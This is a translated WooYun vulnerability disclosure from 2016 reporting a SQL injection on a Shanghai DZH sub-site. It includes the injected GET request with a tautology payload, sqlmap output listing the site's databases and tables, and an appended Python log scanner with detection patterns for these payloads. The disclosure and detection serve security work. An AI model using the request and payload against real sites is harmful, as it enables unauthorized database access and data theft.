Vulnerability Summary
Defect ID: WooYun-2016-185597
Title: SQL injection vulnerability on a Shanghai DZH (上海大智慧) sub-site
Vendor: 上海大智慧 (Shanghai DZH)
Author: 1993*
Submitted: 2016-03-17 09:39
Published: 2016-05-01 13:09
Type: SQL injection
Severity: Low
Self-assessed Rank: 3
Status: Confirmed by vendor
Source: www.wooyun.org (contact us if you have questions or need help)
Tags: none
Vulnerability Details
Disclosure status:
2016-03-17: Details sent to the vendor, awaiting vendor processing
2016-03-17: Vendor confirmed; details disclosed to the vendor only
2016-03-27: Details disclosed to core white hats and relevant domain experts
2016-04-06: Details disclosed to regular white hats
2016-04-16: Details disclosed to trainee white hats
2016-05-01: Details disclosed to the public
Brief description:
Detailed description:
http://xxdl.gw.com.cn/marketIframe.jsp?currentPage=1160&search=&subtype=&type=0
GET /marketIframe.jsp?currentPage=1160&search=&subtype=&type=0%20AND%203*2*1%3d6%20AND%20917%3d917 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://xxdl.gw.com.cn:80/detail.jsp?type=4&id=68236
Cookie: JSESSIONID=8673A86409DE03DF88E08591E991033C
Host: xxdl.gw.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Run through sqlmap
Current database
[*] starting at 00:43:15
[00:43:15] [INFO] parsing HTTP request from 'c:/123.txt'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[00:43:15] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only v
[00:43:15] [INFO] resuming back-end DBMS 'microsoft sql server'
[00:43:15] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: http://xxdl.gw.com.cn:80/marketIframe.jsp?currentPage=1160&search=&subtype=&type=(SELECT CHAR(113)+CH
---
[00:43:17] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[00:43:17] [INFO] fetching current database
[00:43:17] [INFO] resumed: newweb
current database: 'newweb'
[00:43:17] [INFO] fetched data logged to text files under 'C:/Users/Administrator/.sqlmap/output/xxdl.gw.com.cn'
Enumerating databases
Parameter: #1* (URI)
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: http://xxdl.gw.com.cn:80/marketIframe.jsp?currentPage=1160&se
---
[00:43:36] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[00:43:36] [INFO] fetching database names
[00:43:36] [INFO] the SQL query used returns 10 entries
[00:43:36] [INFO] resumed: distribution
[00:43:36] [INFO] resumed: gwmis
[00:43:36] [INFO] resumed: gwmis_new
[00:43:36] [INFO] resumed: master
[00:43:36] [INFO] resumed: model
[00:43:36] [INFO] resumed: msdb
[00:43:36] [INFO] resumed: newweb
[00:43:36] [INFO] resumed: show
[00:43:36] [INFO] resumed: tempdb
[00:43:36] [INFO] resumed: userdb
available databases [10]:
[*] distribution
[*] gwmis
[*] gwmis_new
[*] master
[*] model
[*] msdb
[*] newweb
[*] show
[*] tempdb
[*] userdb
Tables dumped via the injection
Database: newweb
[64 tables]
+----------------------------+
| CustomerMessage |
| D99_CMD |
| D99_Tmp |
| MSpeer_lsns |
| MSpeer_request |
| MSpeer_response |
| MSpub_identity_range |
| article |
| bfb |
| blog |
| blogName |
| comments |
| dtproperties |
| exchangePredict |
| hny |
| hq |
| iMarket |
| iNews |
| iQihuo |
| intAd |
| jiangu |
| jiaozhu |
| news |
| otherMarket |
| peixun |
| ssgs |
| stockComments |
| stockPublic |
| stockQues |
| stockReform |
| syncobj_0x3033373734394136 |
| syncobj_0x3042433833433332 |
| syncobj_0x3043423337434134 |
| syncobj_0x3141424241323643 |
| syncobj_0x3230303031324631 |
| syncobj_0x3234383435423739 |
| syncobj_0x3238383132393033 |
| syncobj_0x3245333346333034 |
| syncobj_0x3342453142354135 |
| syncobj_0x3345363031453930 |
| syncobj_0x3441463130413937 |
| syncobj_0x3538343730414337 |
| syncobj_0x3642414238423243 |
| syncobj_0x3736343243424535 |
| syncobj_0x3745434545373742 |
| syncobj_0x3945314544464636 |
| syncobj_0x4235313841413833 |
| syncobj_0x4335354637313432 |
| syncobj_0x4535383145443832 |
| syncobj_0x4637313444463931 |
| syncobj_0x4642464233414431 |
| sysarticlecolumns |
| sysarticles |
| sysarticleupdates |
| sysextendedarticlesview |
| syspublications |
| sysreplservers |
| sysschemaarticles |
| syssubscriptions |
| systranschemas |
| tablespaceinfo |
| test |
| todayAOne |
| todayIntro |
+----------------------------+
Not going any deeper than this!
Not that I don't know how.
Well, actually I really don't, but the vulnerability definitely exists.
Proof of vulnerability:
See above!
Suggested fix:
You know what to do!
Copyright notice: when reposting, credit the source 1993*@WooYun (乌云)
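As an added detection example (not part of the original report or of sqlmap), the following Python scans web access logs for the two payload shapes visible in this report: the arithmetic tautology appended to the numeric `type` parameter, and the inline SELECT/CHAR() query that sqlmap identified against Microsoft SQL Server. The log lines, client addresses and the completed inline-query value are constructed; only the first request line mirrors the request shown above.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access log (not from the original report). Line 1 reproduces
# the injected request shown in the report; line 2 is a constructed inline-query
# payload in the shape sqlmap reported; lines 3-4 are benign traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [17/Mar/2016:00:43:15 +0800] "GET /marketIframe.jsp?currentPage=1160&search=&subtype=&type=0%20AND%203*2*1%3d6%20AND%20917%3d917 HTTP/1.1" 200 5120
192.0.2.10 - - [17/Mar/2016:00:43:17 +0800] "GET /marketIframe.jsp?currentPage=1160&search=&subtype=&type=(SELECT%20CHAR(113)%2BCHAR(107)) HTTP/1.1" 200 5120
198.51.100.7 - - [17/Mar/2016:00:44:02 +0800] "GET /marketIframe.jsp?currentPage=3&search=&subtype=&type=0 HTTP/1.1" 200 5120
198.51.100.7 - - [17/Mar/2016:00:44:05 +0800] "GET /detail.jsp?type=4&id=68236 HTTP/1.1" 200 8192
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')

# Boolean tautology on a numeric parameter, e.g. "AND 3*2*1=6 AND 917=917".
TAUTOLOGY_RE = re.compile(r"\bAND\b\s+[\d*+\-\s]+=\s*\d+", re.IGNORECASE)
# Inline subquery built from CHAR() concatenation (MSSQL inline-query technique).
INLINE_QUERY_RE = re.compile(r"\(\s*SELECT\b.*\bCHAR\s*\(", re.IGNORECASE | re.DOTALL)

def suspicious_params(target):
    """Return [(name, decoded_value, reason)] for query parameters whose
    URL-decoded value matches one of the injection shapes above."""
    findings = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if TAUTOLOGY_RE.search(value):
            findings.append((name, value, "boolean tautology"))
        elif INLINE_QUERY_RE.search(value):
            findings.append((name, value, "inline subquery"))
    return findings

def scan_log(text):
    """Scan combined-format access-log text; return one alert dict per
    request that carries a suspicious parameter."""
    alerts = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        hits = suspicious_params(m.group("target"))
        if hits:
            alerts.append({"line": lineno, "client": line.split()[0],
                           "path": urlsplit(m.group("target")).path, "hits": hits})
    return alerts

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

Decoding the query string before matching matters: the report's request carries the payload URL-encoded (`%20`, `%3d`), so a pattern applied to the raw request line would miss it.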
Vendor Response
Vendor response:
Severity: Medium
Rank: 10
Confirmed: 2016-03-17 13:09
Vendor reply:
The responsible staff are already handling it.
Latest status:
None